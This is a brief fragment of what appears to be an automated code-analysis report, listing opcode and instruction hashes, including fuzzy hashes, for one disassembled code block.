                                                                    • Opcode ID: d9554b42812539c8719aabed7016aee103e0c5e9701331fb60cb3b0e53f42eea
                                                                    • Instruction ID: 4edf58efe1816e2c65a7dd4d11ba38b903af7166d049ad6fdd9a3b778a22b55f
                                                                    • Opcode Fuzzy Hash: d9554b42812539c8719aabed7016aee103e0c5e9701331fb60cb3b0e53f42eea
                                                                    • Instruction Fuzzy Hash: 40D0C9313C4312BBE774BA719C0EFD77618AB55B50F000829B3C5AB1D4C9E9A800C764